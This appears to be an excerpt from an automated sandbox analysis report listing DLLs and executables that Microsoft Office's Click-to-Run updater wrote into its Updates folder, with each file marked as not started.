    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.it-it.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.de-de.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.da-dk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ja-jp.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvVirtualization.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-mx.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ar-sa.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.lt-lt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hr-hr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nl-nl.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r32werhandler.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.id-id.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ko-kr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-fr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64_arm64x.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ru-ru.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hi-in.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officeinventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\msix.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-br.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.et-ee.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vccorlib140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.kk-kz.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ru-ru.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\offreg.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ar-sa.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.cs-cz.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVFileSystemMetadata.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.lv-lv.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVShNotify.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140_1.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R32.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.uk-ua.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.es-mx.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.tr-tr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVFileSystemMetadata.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.en-us.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvApi.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.bg-bg.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\concrt140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.zh-tw.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.tr-tr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeC2RClient.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVScripting.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.zh-cn.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.it-it.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\inventory.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIntegration.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.th-th.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\msvcp140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-tw.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVOrchestration.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lt-lt.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvStreamingManager.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVScripting.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hi-in.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.el-gr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\policy.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVCatalog.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems32.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RUI.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officeinventory.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msix.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\InspectorOfficeGadget.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvSubsystemController.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hu-hu.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pl-pl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\IntegratedOffice.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nb-no.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R64.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvApi.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sv-se.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\offreg.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeC2RCom.dll (copy)Jump to dropped file
